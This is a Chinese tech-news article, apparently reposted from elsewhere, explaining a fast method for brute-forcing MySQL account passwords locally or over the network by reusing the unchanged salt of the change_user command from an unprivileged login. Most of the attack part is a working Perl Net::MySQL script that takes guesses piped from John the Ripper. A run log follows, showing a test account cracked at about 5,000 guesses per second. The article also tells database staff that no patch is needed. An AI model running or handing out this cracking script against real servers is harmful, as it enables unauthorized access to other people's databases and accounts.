快速高效的破解MySQL本地和远程密码

数据库 SQL Server
快速的 MySQL 本地和远程密码破解!首先需要对数据库维护人员说明的是,不必紧张,你无需修补这个问题,看起来其实是个小错误而已。我找到一个方法可非常高效的破解 MySQL 的用户密码,包括本地用户和通过网络方式访问的用户密码。在我的测试中,通过网络方式的方法可每秒钟测试 5000 个密码。

快速的 MySQL 本地和远程密码破解!首先需要对数据库维护人员说明的是,不必紧张,你无需修补这个问题,看起来其实是个小错误而已。

我找到一个方法可非常高效的破解 MySQL 的用户密码,包括本地用户和通过网络方式访问的用户密码。在我的测试中,通过网络方式的方法可每秒钟测试 5000 个密码。

方法如下:

攻击者使用一个无特权帐号登录到 MySQL 服务器,mysql 有一个名为 change_user 的命令,该命令可用于在 mysql 会话中修改用户时的名字建议。因为这个命令执行非常快,因此可以很快速的用来破解 mysql 密码,而不是每次都重新连接到 mysql 服务器。

是什么导致非常慢?

因为使用 change_user 命令不会更改 SALT(这是一个弱点),而常规破解密码的方法每次连接时服务器都发送不同的 SALT。

下面是一个 Perl 脚本使用了 John the Ripper 的方法来生成密码:

测试的用户是 crackme 密码为 pass,只需数秒就可破解。

(大约 20 秒钟可测试 10 万密码)

测试脚本如下:

  1. use Net::MySQL; 
  2.  
  3. $|=1; 
  4.  
  5. my $mysql = Net::MySQL->new( 
  6. hostname => ’192.168.2.3′, 
  7. database => ‘test’, 
  8. user     => “user”, 
  9. password => “secret”, 
  10. debug => 0, 
  11. ); 
  12.  
  13. $crackuser = “crackme”; 
  14.  
  15. while(<stdin>) { 
  16. chomp; 
  17. $currentpass = $_; 
  18.  
  19. $vv = join “”, 
  20.         $crackuser, 
  21.         “\x14″. 
  22.         Net::MySQL::Password->scramble( 
  23.             $currentpass, $mysql->{salt}, $mysql->{client_capabilities} 
  24.         ) . “”; 
  25. if ($mysql->_execute_command(“\x11″, $vv) ne undef) { 
  26.     print “[*] Cracked! –> $currentpass\n”; 
  27.     exit; 

下面是我这台机器上的执行结果:

  1. C:\Users\kingcope\Desktop>C:\Users\kingcope\Desktop\john179\run\jo 
  2.  
  3. hn –incremental –stdout=5 | perl mysqlcrack.pl 
  4. Warning: MaxLen = 8 is too large for the current hash type, reduced to 5 
  5. words: 16382  time: 0:00:00:02  w/s: 6262  current: citcH 
  6. words: 24573  time: 0:00:00:04  w/s: 4916  current: rap 
  7. words: 40956  time: 0:00:00:07  w/s: 5498  current: matc3 
  8. words: 49147  time: 0:00:00:09  w/s: 5030  current: 4429 
  9. words: 65530  time: 0:00:00:12  w/s: 5354  current: ch141 
  10. words: 73721  time: 0:00:00:14  w/s: 5021  current: v3n 
  11. words: 90104  time: 0:00:00:17  w/s: 5277  current: pun2 
  12. [*] Cracked! –> pass 
  13. words: 98295  time: 0:00:00:18  w/s: 5434  current: 43gs 
  14.  
  15. Session aborted 

原文链接:http://www.kankanews.com/ICkengine/archives/212.shtml

责任编辑:陈四芳 来源: kankanews.com
相关推荐

2010-06-10 15:44:53

2009-10-29 09:50:32

2010-12-03 11:43:51

2011-09-09 19:57:03

2010-05-18 16:50:58

MySQL root

2010-05-24 08:54:10

2010-05-27 18:44:14

MySQL远程连接

2010-12-01 11:23:43

2020-09-24 14:16:39

密码

2011-12-09 10:17:07

2013-07-05 10:04:47

2010-09-26 10:14:11

JVM监控

2010-06-13 13:10:09

MySQLROOT密码

2012-05-11 10:16:17

2009-04-27 22:18:56

2013-08-12 12:36:10

2010-08-30 14:10:08

2009-07-08 15:57:43

2017-09-09 15:13:10

2011-09-01 10:27:26

Android图片本地缓存Android远程图片
点赞
收藏

51CTO技术栈公众号